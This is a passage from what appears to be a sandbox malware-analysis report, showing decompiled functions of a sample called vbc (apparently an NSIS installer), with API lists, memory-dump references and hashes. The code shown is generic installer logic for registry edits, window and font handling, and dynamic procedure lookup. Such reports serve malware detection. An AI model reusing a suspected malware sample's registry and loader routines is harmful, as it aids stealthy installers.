						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?), ref: 00402F74

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32 ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 732816BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E732816BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x732816d7
0x732816e3
0x732816f0
0x732816f7
0x73281700
0x7328170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732822D8,?,00000808), ref: 732816D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732822D8,?,00000808), ref: 732816DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732822D8,?,00000808), ref: 732816F0
GetProcAddress.KERNEL32(732822D8,00000000,?,00000000,732822D8,?,00000808), ref: 732816F7
GlobalFree.KERNEL32(00000000), ref: 73281700

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: b36f37ea9bdec25e6d85313484d1ca601bd530c20be1503a2dbafeab9ada48d4
Instruction ID: 87f744e47864dba006a378ebab0265f89643c481e62591d74499a9f1d0f9563b
Opcode Fuzzy Hash: b36f37ea9bdec25e6d85313484d1ca601bd530c20be1503a2dbafeab9ada48d4
Instruction Fuzzy Hash: B9F0AC732061387FD62126A78C4CEEBBE9CDF8B3F5B214215F62C9219086615D01E7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

0x00404d4f
0x00404d54
0x00404d5c
0x00404d5d
0x00404d6a
0x00404d72
0x00404d73
0x00404d75
0x00404d77
0x00404d79
0x00404d7c
0x00404d7c
0x00404d83
0x00404d89
0x00404d89
0x00404d90
0x00404d97
0x00404d9a
0x00404d9d
0x00404d9d
0x00404da1
0x00404db1
0x00404db3
0x00404db6
0x00404d5f
0x00404d5f
0x00404d66
0x00404d66
0x00404dbe
0x00404dc9
0x00404ddf
0x00404df0
0x00404e0c

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32 ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv7B0.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32 ref: 00402515
RegCloseKey.ADVAPI32(?), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsv7B0.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp
API String ID: 2655323295-361329095
Opcode ID: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000), ref: 00405E1C
lstrcatW.KERNEL32 ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 732810E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E732810E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x7328506c = _a8;
				 *0x73285070 = _a16;
				 *0x73285074 = _a12;
				_a12( *0x73285048, E73281651, _t73);
				_t66 =  *0x7328506c +  *0x7328506c * 4 << 3;
				_t27 = E732812E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x73285040;
							if( *0x73285040 == 0) {
								goto L26;
							}
							E73281603( *0x73285074, _t31 + 4, _t66);
							_t34 =  *0x73285040;
							_t86 = _t86 + 0xc;
							 *0x73285040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73281312(E7328135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
